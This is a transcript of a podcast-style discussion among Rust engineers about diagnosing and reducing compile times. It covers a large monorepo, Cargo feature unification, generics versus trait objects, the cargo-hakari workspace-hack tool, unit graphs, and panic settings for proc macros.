What's taking so long?!

Speaker 1:

This is where we do the intro music? This is the,

Speaker 2:

oh, yeah. You said you had been working on a rap that you wanted to try out.

Speaker 1:

No. I told you that in confidence. It was a very vulnerable moment.

Speaker 2:

So if

Speaker 1:

I were going to rap anything, it would be this Gen Z Bible. But I think you

Speaker 2:

see the thing that happened.

Speaker 1:

Oh, that would that

Speaker 2:

I loved it. I was gonna try to, like, mix in some Gen Z-isms, but, like, I would just flub it. But it was delightful.

Speaker 1:

So the question is... most of my kids told me, like, Dad, you think this is way too funny. I'm like, I do think this is really funny. This is really funny. I thought there were some great lines in there. I should say, folks did not see this.

Speaker 1:

Did you have a favorite verse in there, Adam?

Speaker 2:

I think there was, like, a "we got you, fam" kind of thing from the snake that really had me going.

Speaker 1:

I did like it when Adam said, what is up, my mammals? Go forth and vibe in Minecraft Paradise.

Speaker 2:

Go forth and vibe.

Speaker 1:

There's so much good stuff in here. Yeah. And then the divine G caught them in 4K and said, "Bruh."

Speaker 2:

I, you know, I didn't tell my own son, because, like, I also found it way too amusing, and

Speaker 1:

I think he would've been really put off by how funny I thought it was. Yes. Well, you picked wisely. I did not pick wisely; I just thought it was way too funny and really insisted on reading way too many verses aloud to my own children.

Speaker 2:

Where where did this book come from?

Speaker 1:

Our colleague Aaron. I guess maybe his brother showed him this? I've got no idea.

Speaker 1:

I don't know where this mythical thing came from. And a bunch of people were like, show me the rest. I'm like, oh, god, all I've got is one page. I don't know.

Speaker 1:

It's really amazing. There was a bit of a debate in our house about who wrote it, what generation wrote it. And my kids in particular believe that, like, no self-respecting Zoomer wrote this. This is not Gen Z. My kids troll me by calling me a boomer, and it really does successfully troll me.

Speaker 1:

I'm really angry about how successfully trolled I get every single time. They're like, what

Speaker 2:

if AARP is kinda nipping at your heels these days anyway.

Speaker 1:

AARP is nipping at my heels. He's like, one of you boomers wrote it. I'm like, it was a Zoomer. Sorry.

Speaker 1:

Wild times. Welcome. We've got Rain here, Rain Paharia, and Sean Klein, and Steve Klabnik, to talk about a hot topic: compile times. Adam, I thought we might give an intro to this about our personal journey through compile times. And maybe part of the problem is that you and I have our expectations set too low. Do you agree with me that we

Speaker 2:

No. Dovetailing perfectly from the generational conversation. No, I agree with you. I mean, I think it bears explanation that, you know, my first job, your first job, was at Sun Microsystems working on the Solaris kernel, and the script to build the thing is called nightly.

Speaker 2:

Nightly. Which tells you the frequency at which it is expected to complete.

Speaker 1:

And at one particular dark moment in Sun's history, it took more than 24 hours to compile. To compile absolutely everything. Yeah. That was considered a low point in many different dimensions, because your ratio of system complexity to build performance is clearly off; you've overburdened the system when it takes more than a day. So, yeah, that was kind of our upbringing: you get used to the idea that building everything just takes a long time. And you also get really used to doing a lot with, kind of, pencil and paper.

Speaker 1:

But that's really not true of much of the other software we developed, where we love quick iterations, and quick iteration becomes really important. And so I confess that I kinda liked, and "liked" is a bit too strong, the fact that Rust did take a long time to compile. It just felt like the computer's doing work: it's taking a long time to compile because it's solving really hard problems for me. I kinda thought it was great. This is really pathetic.

Speaker 1:

It's like Stockholm syndrome, I think, at times.

Speaker 2:

No. Absolutely. But it also kinda sneaks up on you. Right? For at least most of these things, I mean, everything I've worked on at Oxide, it didn't start off slow.

Speaker 2:

It got slow. And, you know, you're in the pot of water that's gradually heating up, and it's hard to notice that you're cooking.

Speaker 1:

Yeah. And I gotta tell you about the first time I really got burned by compile times. So Humility, the debugger for Hubris, was taking longer and longer and longer to compile. And that is one of those things where I'm just trying to change the output of something. Like, that thing needs to be one column over to the right.

Speaker 1:

Like, I really do wanna be like, okay, come on, let's see: what does it look like now? What does it look like now? What does it look like now? You really want to do these quick iterations.

Speaker 1:

And one of the problems there was, the way it had been kinda architected up to that point, anytime you touched anything, it had to rebuild everything. And, you know, sometimes I feel like it's great to have new employees join a company, because you feel like you need to get things cleaned up because you're embarrassed. And I'm not sure

Speaker 3:

Yeah.

Speaker 2:

Yeah. Company is coming for dinner.

Speaker 3:

It's like Hope he's coming for dinner.

Speaker 1:

I was here for dinner. And you gotta, like, act like it was always that way. And so, I feel like, Matt Keeter was about to join Oxide. I'm like, he can't join with these kinds of compile times. Like, this is no good. I gotta scramble to make this thing so you can actually iterate.

Speaker 1:

And right now, Matt, wherever he is, is thinking, like, these were the compile times after

Speaker 2:

you worked on it? Like, that was better? Like, what was it before?

Speaker 1:

It's like, I feel bad for you. But, yeah, it used to be a lot worse, because then we made it better. But I think you're right: it kind of incrementally gets bad. And then you kinda wake up and you're like, wow.

Speaker 1:

These iterations are taking a long time. And then I think there's also a tension with just the size of the repository. Right? And, you know, we have tended towards not quite a monorepo, but Omicron, our control plane, is a single repository. And it's big.

Speaker 1:

So there's a lot of compile work that happens. And, Sean, you've been with Omicron from its very earliest days, so you've kinda felt this thing get slower. And I know this is an issue that has definitely been under your fingernails, and you've spent a lot of time investigating. Do you wanna talk about your history with respect to Omicron build times?

Speaker 3:

Yeah. The fact that it is a monorepo is definitely one aspect of it. I definitely agree with the boiling-frog analogy that was being made here, because as we were building it up... I mean, build a small prototype of a control plane that does a few interactions with a database and exposes an HTTP interface, and it's not so bad. But then you start to grow it: you add authentication systems, you expand the feature set, as well as how big the interfaces you're exposing are and how you're communicating between a lot of different services. Not only do the build times grow, but it's a lot harder to see, and to make clear, which changes are making things worse and where things are slowing down.

Speaker 3:

So it sort of became a problem of crossing a certain threshold: not only was improving the build speed a big factor, but also making sure that we could actually interrogate the build and figure out which aspects of it are causing it to be slower or faster, and what the different ways we're building it are. Because building the entire control plane under test is very different from building the entire control plane for production, versus building it the way developers sometimes do, with cargo check commands, which don't actually produce artifacts but still do the type checking and give you a lot of quick feedback. Each one of these different flavors, these different ways to build, has different settings and different parameters, and that's something that Rain actually uncovered pretty recently. Unifying a lot of that stuff was a big win.
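
For reference, a rough sketch of the build flavors Sean is contrasting, in a plain cargo workspace:

```console
$ cargo check            # type-check only: no artifacts, quickest feedback
$ cargo build            # dev-profile build
$ cargo test             # builds (and runs) the test configuration
$ cargo build --release  # production profile: optimized, slowest
```

Each flavor can end up with different settings, features, and flags, which is the unification problem discussed later in the episode.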

Speaker 3:

But, yeah, that sort of aspect of being able to ask the system, why are you taking so long, is one of the most important parts of all of this, for getting to the bottom of what's going on.

Speaker 1:

Totally. Yeah. And, well, just kind of before we get to some of our methodology there: I think the absolute times do actually matter. Right?

Speaker 1:

Because it feels like, once you hit a certain threshold, it's, I'm not gonna sit there and stare at this thing. And that threshold is probably different for different people, but it's somewhere in, like, the 45 seconds to 3 minutes range, where you're like, okay, I need to go off and do something else. And then, actually, the build time is not 3 minutes; it's actually, like, 38 minutes, because you got distracted by something. Or, if you're lucky, you're off helping out a colleague or engaged in another productive discussion.

Speaker 1:

I think if you're like many of us, it's more likely, how long was I on that Hacker News thread, or what have you. And it's like, yeah, I left because of the build. You know what I mean? I found that I got much more productive when I set timers for some of the longer things that we needed to go do.

Speaker 1:

And so my timer would go off, and I'd go, okay, wait a minute: my build needs to come out of the oven now. Because, Sean, the absolute times do matter, don't you think?

Speaker 3:

I totally, totally agree. And this is actually a good point: there are many different types of builds. Are you checking out the repo for the first time and doing a build from scratch? Or did you edit one file and you want to see what's going on? Because I heard your comment earlier about coming to Rust and feeling like it's doing things, right?

Speaker 3:

It's thinking about the build, it's doing borrow checking, it's doing all this fancy stuff that benefits me as a developer. I can empathize with that the first time that you build it. But when you change one file and it's cranking along, as you said, for some small change to the output, something that doesn't feel like it should take that long to build, it becomes a lot more frustrating, and there's that question of why. What's going on? Yeah.

Speaker 1:

And so, Steve, give us some history here before we get to Rain's big win. I think, actually, shortly before I came to Rust, there was no incremental compilation whatsoever. Right? I mean, wasn't there a time when everything had to be rebuilt all of the time?

Speaker 4:

Yes. And, to be clear, that's like each crate would need to be rebuilt individually. It's not like you were recompiling all of your dependencies on every cargo build. This is actually kind of an interesting thing, where we have historically used some terminology that's kind of wrong now because of this. It used to be: what is a crate? A crate is a compilation unit, because it's the thing you pass to rustc.

Speaker 4:

But, like, that's not true anymore, because then we added incremental compilation, and now compilation units can be much smaller. So all that stuff got tacked on kinda later, and it makes things a little fuzzy. But, yeah, it used to be even worse. Right.
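
As a sketch of where that incremental machinery is surfaced today (the values shown are cargo's current per-profile defaults):

```toml
# Cargo.toml
[profile.dev]
incremental = true    # dev default: reuse intermediate results across builds

[profile.release]
incremental = false   # release default

# It can also be overridden per invocation:
#   CARGO_INCREMENTAL=0 cargo build
```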

Speaker 1:

Well, I think it's that way with, like, a lot of things. I mean, I showed up to Rust in 2018, and I feel like a lot of things have just gotten suddenly better. Or maybe I've just got, like, no self-respect and a high threshold for pain, because a lot of things that I think had been pain points were being very quickly alleviated. And

Speaker 4:

It's not an issue of compile times, but this has been one of my recurring drums throughout the description of early Rust history, one that I beat on all the time: a lot of the Rubyists who came to Rust in the early days, our function was to tell the systems people that you can, in fact, have nice things. It is, in fact, possible. Right? It's kind of the story of Cargo in general.

Speaker 1:

Yeah. Like,

Speaker 4:

people were skeptical. Well, this is the second Cargo, because there were, like, 5 different build systems way back then, but this is not about those things right now. The point is, some people would be like, yeah, I'm never gonna use that Cargo thing, because it's a toy and it can't do real systems programming. And then Cargo got shipped, and they were like, oh my god, I'm never writing a Makefile again.

Speaker 4:

Their sun comes out, you know, the birds start singing. So, yeah.

Speaker 1:

You know, it is funny you say that because I do feel like I'd be like, no. No. No. We don't deserve nice things. No.

Speaker 1:

No. No. We don't deserve it. We've never had it. So no.

Speaker 1:

No. You can't actually have nice things. And then when you do have nice things, other great things become possible. Adam, do you use Rust Analyzer? You do.

Speaker 1:

Right? No.

Speaker 2:

Yeah. Oh, yeah. I mean, wait, are you turning the tables on me? Like, I feel like I've spent the last year and a half trying to convince you to use it.

Speaker 2:

No. I was pretty sure

Speaker 1:

I was trying to convince you to use it, wasn't I?

Speaker 2:

What is going on? This is actually just some new level of gaslighting. No. No. I love... I use Rust Analyzer.

Speaker 2:

Like, I don't like looking at code reviews on GitHub, because I lack the annotations that Rust Analyzer gives me in the editor.

Speaker 1:

Yeah. And I need to... that's clearly, like, amazing, Rust Analyzer. And

Speaker 2:

It is amazing.

Speaker 1:

Should I use Rust analyzer before or after syntax highlighting if you had to, like, stack rank them?

Speaker 2:

Oh, Rust Analyzer over syntax highlighting all day. It's way more useful.

Speaker 1:

Yeah. No, it seems like it'd be very valuable.

Speaker 4:

There was a possible future where Rust Analyzer would slowly have eaten the compiler, and then at some point that dream died. But in my alternate-history Rust, I kinda wish that plan had gone through.

Speaker 1:

So elaborate on that, Steve. What does that mean? That means that Rust Analyzer...

Speaker 4:

Yeah. So compiler technology has changed a lot since the Dragon Book. The way that we teach people how compilers work, and the way that a lot of people think about compilers, is: okay, you lex, you parse, you have some sort of AST, you do transformations on the AST, you do codegen, you spit it out. But the thing is, that only works for batch compiling.

Speaker 4:

And the history of tooling, especially, is that, one, you need to really deal with the incremental case, because we are now running the equivalent of a compiler all the time. And secondly, you need to handle malformed input better than a classic compiler does. A classic batch AOT compiler... you know, my friend tef has this post. He's like, programmers like to read blog posts the way a compiler would read code.

Speaker 4:

They find the first sentence they disagree with, and then bail out and, like, print an error message. And that's how classic batch compilers work. Right? Here's my error, and maybe they give you some additional ones, but often those aren't that great, and then they go back. But for things like IDE tooling, it would be a really bad experience if you had a typo in your source code and all of the inferred types disappeared from your UI because Rust Analyzer could no longer figure any of that out.

Speaker 4:

Right? So we kind of have these two different things coming at compilers. And, specifically, the Roslyn compiler for C#, which eventually kind of ate the classic compiler and replaced it, is based on incrementality up front. Rust's compiler was written as a very classic batch compiler originally, and now it is a much more complicated amalgamation of, kind of, sort of, both of them. I am not as knowledgeable about the compiler internals as I used to be, so I don't wanna make too many sweeping statements and say things that are not entirely true, so please take what I say with a grain of salt.

Speaker 4:

But the point is, they added this thing called the query system that's intended to make it more incremental and better at those kinds of things. But you could also make the argument that this doesn't work well unless you start the project that way from the beginning, because the techniques that you use to implement all these things work differently. You're changing the fundamental architecture of the system. It is just a different system. You know what I mean? So, yeah.

Speaker 1:

Interesting. Yeah. And so, meanwhile, stuck in this kind of batch compilation world, we need to have an understanding of where all the time is going. So I guess, maybe, Sean, do you wanna talk about some of your explorations, as a segue into Rain here, about where all the time is going? So I'm running cargo build, and that last step in particular seems to take a long time.

Speaker 1:

What's happening there, and what's some of the tooling that you've used to figure out what's happening?

Speaker 3:

Yeah. So, like, the first tool that I'd recommend, if anyone else is building a Rust project and is in a similar position: cargo build has a flag, --timings, that's pretty good, and it's pretty well documented. It can basically give you a build graph, a crate-by-crate breakdown of what is being built where, on a linear timeline, and you can see that output. And that's pretty useful if you're asking, which of my crates are taking the longest time to build?

Speaker 3:

That can be particularly useful if you have, like, a dependency that takes a really long time to build in your small Rust project and just inflates everything, or if you're building a bunch of stuff in a workspace and trying to figure out which one of these crates is actually the long pole. But that sort of stops at a certain granularity. You really get "which crate is it," and then you kinda stop getting answers at that point. You know, okay, I can see this crate takes a long time to build, and I'm working on it.
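
A minimal sketch of the invocation Sean describes:

```console
$ cargo build --timings
# Writes an HTML report with the per-crate timeline, e.g.
#   target/cargo-timings/cargo-timing.html
```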

Speaker 3:

And so it makes sense that it's rebuilding. But then, why that one? What is actually going on under the hood here? Right. And this is where I find the space of optimizing Rust builds really interesting, because there's not really one answer for where you go next. There's a lot of different answers.

Speaker 3:

So there are a lot of...

Speaker 1:

Always a special kind of challenge, right, when there's a lot of different answers, because people will get a lot of suggestions: oh, I think the problem is over here, or the problem is over there. It's like, well, you're actually all kind of right, to a certain degree. I mean, it's great to have a target-rich environment, but it makes it complicated.

Speaker 3:

Yeah. For sure. There are a lot of different signals that you can look at, but a lot of them are just that: signals. They're proxies for other data. So, like, a classic one is you can look at tools like cargo-llvm-lines or cargo-bloat.

Speaker 3:

Those are great ways of asking: what are the aspects of my build that are contributing to a large binary size? That sometimes helps for finding the spot where your build was actually slower, but it's a proxy. Right? You're saying, I think it's the things that get built really big; that can help. And it has helped us in several cases where, you know, we used generics in a way that inflated what the compiler was actually working on, and those tools helped find those cases.
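
Both are third-party cargo subcommands; a sketch of typical usage:

```console
$ cargo install cargo-llvm-lines cargo-bloat
$ cargo llvm-lines | head -20     # lines of LLVM IR per monomorphized function
$ cargo bloat --release --crates  # estimated binary size, crate by crate
```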


Speaker 1:

And then how did you solve that problem? When you have, like, okay, we're getting more monomorphization than we want, how do we actually go address that? Or how addressable is that?

Speaker 3:

Yeah. And so there are a lot of different people who have written about this. And, Steve, I know you've personally worked through this on Dropshot, our HTTP server. But the kind of classic way of doing this, if you still want to have the same function signatures: let's suppose that you have a function that's fully generic. Whatever the body of the function is, every single time you call that thing with new generic parameters, you're gonna be creating basically a new copy of that function. I'm being hand-wavy, the compiler does somewhat different things than that, but that's a rough proxy for how to view it. A really common technique here is that you create a very thin shim: a generic version of the function that calls through to a non-generic function. So your generic call basically becomes a very, very thin call to a non-generic function, which means that you do still have a bunch of copies of the generic function, but each one is much, much, much smaller. It's just taking your arguments and making a function call with them. Sometimes that's possible, and sometimes that's not possible, or it's very, very painful to refactor code to be able to do that.
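
A minimal sketch of that shim pattern in Rust (the function names are invented for illustration):

```rust
use std::path::Path;

// Generic shim: one copy of this is generated per distinct `P`,
// but it contains almost no code.
pub fn load_config<P: AsRef<Path>>(path: P) -> std::io::Result<String> {
    // Convert to the concrete type, then delegate.
    load_config_inner(path.as_ref())
}

// Non-generic body: compiled exactly once, no matter how many call
// sites use `load_config` with different argument types.
fn load_config_inner(path: &Path) -> std::io::Result<String> {
    std::fs::read_to_string(path)
}
```

The standard library uses this same shape internally in a few places; the win scales with how large the function body is and how many distinct types call into it.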

Speaker 1:

And have you found that, presumably, a small fraction of these give you the biggest possible wins? I mean, did you find that you can get big wins doing this?

Speaker 3:

In certain cases. I hate to do this, because it's like... yeah, go for it, Steve.

Speaker 4:

I was gonna say, I linked the PR that Sean was referencing a minute ago in the chat. It is a, what is this, minus 4, plus, like, 8 lines? A 10-line PR that resulted in, like, 5 seconds being knocked off the build times of Omicron. So

Speaker 1:

Yeah. So pretty much.

Speaker 4:

You get, like, pretty significant leverage.

Speaker 4:

Of course, this is always subject to caveats. This is based off of an optimization called outlining that compilers do. You're basically doing the compiler's job for it, deliberately. And so sometimes, like all optimizations, it's better and sometimes it's worse.

Speaker 3:

Yeah. Going through this experience has honestly changed my mind with respect to generics. Before fighting compile times, I was so excited about generics in Rust for the ability to have, like, good expressibility of different types. You know, being able to really have unique types that represent different things, and fully exploring that part of the type system. But after going through this aspect of build times, I still appreciate that, but it's definitely with a very, very solid grain of salt.

Speaker 1:

Interesting.

Speaker 3:

Yeah. These things have a cost. And in the case that Steve linked, I think that's actually a great example of where it worked best. Right? Because that's a case where we basically had each one of these endpoints as a generic thing, and the body of it could be separated out. But depending on how you're passing around generic parameters, it's not always possible to make these refactors.

Speaker 3:

Like, Steve, I remember you and I worked together on trying to change the generic parameters of one of our crates, and we just couldn't detangle the level of generics that was happening there. Yeah. Because it wasn't as simple as: the body could be made non-generic. There were generics being passed through for very legitimate reasons. But, yeah, this has in many ways also made me more comfortable with the idea of using trait objects, very judiciously, where it's appropriate.

Speaker 4:

I also need to briefly confess that part of the attitude that Sean is expressing is kind of my fault, because I basically put it in the book and told everybody, and was part of that early culture of: always use generics and not trait objects, always use generics and not trait objects. And we didn't do as good of a job of describing the balance. I still think that ultimately that's the right call, but I think many people don't fully appreciate the trade-off, partially because of that history, and I didn't do a good job of explaining it. So

Speaker 1:

Yeah. So are you gonna have a tell-all retrospective where you...

Speaker 3:

Oh, got it.

Speaker 4:

I will tell some things in a retrospective, sure, but, of course, not every story gets told.

Speaker 1:

Right. So, yeah, you need a documentary where you can confess it all. So, before Steve goes full Robert McNamara on us, could you expand a little bit, Sean, on what you mean by trait objects, and where you'd use them now instead of generics?

Speaker 3:

Right. So if you're acting on an object in Rust where you really care that the object implements a trait, or a set of traits, you basically have more or less two choices for how you're gonna interact with that object. Let's suppose that you're writing a function that's going to take this thing in. You can make that function generic, and operate on a generic, impl T version of that trait. Or you can make that function not generic, but have it act on a dyn version of that trait.

Speaker 3:

So that can be, like, a reference to a dyn object. If you're doing more complex things with a lifetime, you might need to box that object to make sure that you can actually pass it around. But that's more or less the trade-off that I'm discussing here: which one of these do you wanna take? Do you wanna do the dyn object, or do you wanna act on the generic? If you're acting on the generic object, then the compiler can basically take the template that you've provided and paste in the appropriate type, as efficiently as possible, at compile time.

Speaker 3:

Whereas if you go the dyn route, you are adding a layer of indirection that, at runtime, will cause an extra lookup, more or less. Rust uses fat pointers in this situation, so it's going to keep around... I believe the terminology is that it's still called a vtable in Rust, right? Or I don't know if there's different terms for it.

Speaker 5:

Yep. Yep.

Speaker 4:

The main significant difference is in the way the code is laid out in C++ versus Rust, but it's still a vtable, and it's still called a vtable in both languages.

Speaker 3:

Yeah. And so, depending on what your situation is, like, if you're writing high-performance code, this can make a difference. I would also throw out that in many situations, if you're doing this in code that is also opening a file, communicating over a network, anything like that, the cost of the choice between the template and the trait object is going to be so low, so negligible compared to the other work that's ongoing, that it probably won't make that much of a difference. But there is that trade-off to be made. Right? And there's always that desire to reach for... well, you don't wanna set yourself up for something that's harder to optimize later. But it's sort of that question of: are you optimizing your runtime?

Speaker 3:

Are you optimizing your build time? And, classically, at the end of the day, it's kinda speculative until you actually look, because who knows? Maybe, by having generics, your binary size is bigger and you're actually blowing out a cache. But that is sort of the trade-off between which one of these you're paying for: the generic route or the trait object route.
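
A minimal sketch of the two choices Sean lays out (the trait and function names are chosen just for illustration):

```rust
use std::fmt::Display;

// Generic: monomorphized. The compiler emits a separate copy of this
// body for every concrete `T` it is called with: fast calls, more codegen.
fn describe_generic<T: Display>(value: T) -> String {
    format!("value: {value}")
}

// Trait object: compiled once. `&dyn Display` is a fat pointer (a data
// pointer plus a vtable pointer), and the `Display` call is dispatched
// through the vtable at runtime.
fn describe_dyn(value: &dyn Display) -> String {
    format!("value: {value}")
}

fn main() {
    // Two monomorphized copies: one for i32, one for &str.
    println!("{}", describe_generic(42));
    println!("{}", describe_generic("hello"));

    // Both calls share a single compiled body.
    println!("{}", describe_dyn(&42));
    println!("{}", describe_dyn(&"hello"));
}
```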

Speaker 1:

Yeah. The dogma is big on generics; it's just, like, don't even mention traits. Why are we talking about traits here? The runtime cost. You mentioned the runtime cost.

Speaker 1:

But I also feel, Sean, to your point, that in most cases the actual runtime performance difference will be negligible. I do think it's really important to, one, be quantitative about all of this stuff, because some of the things that you think are expensive are not as expensive as you might think, and there are some things that are really very costly elsewhere. One of the things that you said early on is that one of the most frustrating things is when you, the programmer, really feel like Rust is doing work it doesn't need to do. And I feel like that happens most frequently when you do a build, make a small change, do another build, and it's like, why are we rebuilding that now?

Speaker 1:

Like, we now seem to be rebuilding a bunch of stuff. And, Rain, you had one of these very recently that maybe you can go into depth on, where you got a lot of stuff being rebuilt that you felt should not have been rebuilt. Can you go into a little bit about what that problem was and how you debugged it?

Speaker 5:

Yeah. So, I just wanna start off by saying that I love Cargo. I think Cargo is fantastic. Right?

Speaker 1:

Cargo is now moving uncomfortably in its seat. Like, what's coming? What's coming next?

Speaker 5:

So Cargo has a lot of really, really useful features for all sorts of open source scenarios. Like, for example, it lets you turn individual bits of a particular crate on or off. It lets you cross-compile. It lets you do many other things that are actually kind of fancy. The thing, though, is that a lot of those features end up actually being pretty dismal for compile times. And at this point I've spent probably over a year of my dev time trying to figure out, okay, how do we make this better?

Speaker 5:

And so, both at my last role at Meta as well as over here, I have spent a long time analyzing this. Okay, so a common situation is that you're in a large workspace, or a monorepo, whatever you want to call it, and you run cargo build. Right? And then something fails.

Speaker 5:

Right? Let's say something fails, and then you want to rebuild a particular project, or a particular crate, so you run cargo build -p with the name of the crate. And all of a sudden, you're not just rebuilding that crate. You're actually rebuilding the entire world.

Speaker 5:

And the reason that happens is because of the way Cargo works, and specifically the way Cargo's features feature works. The way it works is that you specify, like, a set of crates, or a single crate, or whatever, to build, and Cargo looks at all of the dependencies. Let's say that you have 2 dependencies, a and b, and there's a transitive dependency, c. Right? Now, let's say that a depends on c with a particular feature, foo, and b depends on c with a particular feature, bar.

Speaker 5:

Right? Now, what happens is that if you build a and b together, then Cargo will unify those features, such that c is built with the features foo and bar. But if you build just a separately, then you just build c with foo, and if you build b separately, then you build c with bar. So if you do these 3 builds, you're actually gonna build c 3 times. Now, that doesn't sound too bad at first.

Speaker 5:

Right? But what happens is that if a crate is rebuilt, then all of its dependents are also rebuilt, transitively. So as a simple example, the syn crate, which is widely used in the Rust ecosystem for syntax parsing, basically every proc macro uses it. It has, like, 15 or so features. Right?

Speaker 5:

I don't know the exact number, but it's something like that. Right? And a lot of crates that depend on syn enable some subset or other of those 15. So, you know, some proc macros need the ability to visit the syntax tree. Some proc macros need, like, the ability to serialize, and so on.

Speaker 5:

Right? So now what happens is that you have, what, 2 to the 15 feature sets that could potentially be built. So all of a sudden you have this literally combinatorial explosion of feature sets that can be built. And because syn is so core, every single thing that depends on syn also gets rebuilt. So all your proc macros get rebuilt, which means that all your proc macros get run again.

Speaker 5:

So anything that imports or uses those proc macros gets rebuilt, and so on. It's honestly kind of a disastrous scenario at the moment. Like, this is not good at all. And so that's the world that I saw when I started looking at the problem. And so I've built out a whole bunch of tooling, which I can go into more detail about, trying to fix this problem and so on.
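
A sketch of the unification behavior Rain describes, with hypothetical workspace crates a, b, and c:

```toml
# a/Cargo.toml
[dependencies]
c = { version = "1", features = ["foo"] }

# b/Cargo.toml
[dependencies]
c = { version = "1", features = ["bar"] }

# cargo build        -> c built once, features ["foo", "bar"] (unified)
# cargo build -p a   -> c rebuilt with just ["foo"]
# cargo build -p b   -> c rebuilt with just ["bar"]
```

Three feature sets, three separate compilations of c, and each rebuild of c invalidates everything downstream of it.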

Speaker 5:

And it turns out that it does work. It fixes the problems. Though it ended up actually exposing a whole bunch of other problems that we found while trying to figure out what was going on. Yeah.

Speaker 1:

Rain, could you describe the tooling in just a little bit of detail, so people can know: boy, I've got this problem, like, how

Speaker 2:

Yeah.

Speaker 1:

How do I alleviate this? Because it feels difficult. It feels difficult to alleviate.

Speaker 5:

Yeah. So, alright. So, a long time ago, I used to work on Firefox. And so I got pretty intimately familiar with the mozilla-central repository. And, you know, even after I stopped working on it, I'd still, like, check it out, browse the source code every so often.

Speaker 5:

And so when they introduced Rust, a thing that I noticed pretty quickly is that they ran into the exact same issue. And so they introduced what they called a workspace-hack crate. The idea behind the workspace-hack crate is that it is this crate sitting on the side. It is completely useless, except that for certain dependencies, like, for example, syn, it specifies the union of all the features that all of the dependents that use syn actually end up requiring. And also, every single crate in the workspace in mozilla-central depends on this workspace-hack crate.

Speaker 5:

And so this solves the problem, to the extent that, and this is managed by hand in mozilla-central as far as I know, there's, like, a human keeping things up to date. Because everything depends on the workspace-hack, syn always gets built with the same features. So I ended up writing a bunch of tooling to actually automate this: cargo-hakari. This is an automated workspace-hack manager that I built out, and what it does is it basically looks at all of the dependencies and figures out, okay, here are all of the dependencies outside the workspace that are built in more than one way.

Speaker 5:

And then it just adds lines to the workspace-hack crate's Cargo.toml saying, okay, build this with the union of all features. So it's something that gets automatically managed. It's built to also be used in CI, to make sure things are kept up to date and so on. And so I switched Omicron, our control plane monorepo, over to that a few months ago. And the results of that were pretty good.

Speaker 5:

Like, you know, now you could jump around and do cargo build, cargo build -p foo, cargo build -p bar. And that did improve build times quite massively. There ended up being a whole bunch more that we needed to do to achieve that, but that was kind of the big thrust of what we achieved.
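
The cargo-hakari workflow is roughly this (subcommand names as documented in its README):

```console
$ cargo install cargo-hakari
$ cargo hakari init workspace-hack  # create the workspace-hack crate
$ cargo hakari generate             # compute the unified feature lines
$ cargo hakari manage-deps          # make workspace crates depend on it
$ cargo hakari verify               # check it's up to date (good for CI)
```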

Speaker 2:

Yeah. And that's great, Rain, because one of the pathologies we were seeing in that Omicron repo is that there were some kinds of work that people kinda didn't wanna do, stuff that should have been easy but wasn't, because even those narrow kinds of builds took so long. Some of those rapid iterations, Bryan, that you were alluding to just weren't rapid. So it's been a big boon.

Speaker 1:

Yeah. It'd been a big boon. But then, Rain, we had an issue where you'd done all this great work with cargo-hakari, and we were still rebuilding stuff. You're like, wait a minute, what's... I fixed this.

Speaker 5:

Yeah. So,

Speaker 1:

I've had that feeling a couple of times in my career. It's like, how is this? You are not allowed to be a problem right now, because I've already fixed you. So sorry, problem. Did you not get the memo?

Speaker 1:

You've been fixed. What are you doing still here?

Speaker 5:

Right. So that's that. So, you know, a coworker filed an issue on me saying, I was expecting cargo-hakari to fix this, and it seems better, but it isn't actually completely fixed. So, to actually diagnose that, I ended up doing a whole bunch of debugging. The tool I ended up using the most: Cargo actually has this thing called a unit graph, as an unstable feature. So what you can do with the unit graph is... alright.

Speaker 5:

So, backing up. Right? The way build systems work is that you have what is called a dependency graph. So you write out a workspace which has these Cargo.toml files.

Speaker 5:

These Cargo.toml files specify your dependencies and so on. And then what Cargo does, as a build system, is turn this dependency graph into a more fine-grained graph, and that fine-grained graph is what is called a unit graph. Other build systems, like Buck, have this notion as well; they call it an action graph. It's basically the same thing. What that ends up doing is expressing each step in the build process as an individual atomic step. So, for example, let's say you are building a crate that has a build script.

Speaker 5:

Right? So the first step needs to be: compile the build script. The second step is: run the build script. And then the third step is: compile the actual crate. Right? So a single dependency turns into 3 nodes in this unit graph, or action graph.

Speaker 5:

So how do you examine this graph? Because this graph actually seems pretty useful: it will tell us which dependencies get rebuilt, and why they're getting rebuilt. This graph captures things like what settings are used, how builds are done, the features that are enabled, and so on. And Cargo does let you spit out a unit graph, using this --unit-graph option. So I ended up basically examining this unit graph by hand, and discovered a whole bunch of things that were preventing objects from being reused.
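
A sketch of pulling that graph out and poking at it; the flag is unstable, so the exact field names may shift between toolchains:

```console
$ cargo +nightly build --unit-graph -Z unstable-options > unit-graph.json
# One JSON document: a "units" array, one entry per atomic step, with
# its package, profile, and features, plus the edges between units.
$ jq '.units[] | {pkg: .pkg_id, features, panic: .profile.panic}' unit-graph.json
```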

Speaker 5:

So one example of a thing that was preventing objects from being reused: when we build Omicron, we build it and ship it with panic = abort set. Giving a little background there: by default, you have a Rust program, you panic, and what happens is that you get this backtrace. You can actually catch this panic, typically. It isn't meant as an exception handling mechanism, but in some situations you can use it as one. And that is what is called panic = unwind.

Speaker 5:

Now, when we ship Omicron, we actually ship it with a different panic setting, which is panic = abort. And what that does is abort the process completely rather than unwinding. Right? So you get a core dump, which is useful, but otherwise the entire process dies, and something must bring it up again if it's a service or something. So we had set panic = abort for both release and dev builds. But it turned out that if you're doing a dev build, and that dev build has a proc macro or a build script, then that is always built with panic = unwind.

Speaker 5:

And the reason that is built with panic = unwind is that a proc macro is an in-process plugin for the Rust compiler. So if a proc macro were built with panic = abort, and the proc macro panicked for whatever reason, then rustc would not exist anymore. It would not be able to provide a useful error message at all.
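
The profile settings in question look roughly like this; as Rain explains, cargo quietly overrides the value for proc macros and build scripts, which is what split the build graph in two:

```toml
# Cargo.toml (workspace root), a sketch
[profile.release]
panic = "abort"   # shipped builds: abort (and core-dump) on panic

[profile.dev]
panic = "unwind"  # dev builds: match what proc macros and build scripts
                  # are forced to use anyway, so objects can be shared
```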

Speaker 1:

Yeah. You know, Rain, we kinda kicked off talking about the Gen Z book of Genesis, and I really feel like this is where we all collectively bit the apple: proc macros are amazing, because you get to write software that becomes a part of the build process, but there is a cost to that. And, of course, when you explained it, I'm like, oh, yeah, of course that makes sense.

Speaker 1:

You would not wanna have panic = abort, because then it would be bad: basically, a bug in a proc macro, a panic in a proc macro where you actually want to bail out and have an error message, would result in just, like, a segfault. And

Speaker 5:

Exactly.

Speaker 1:

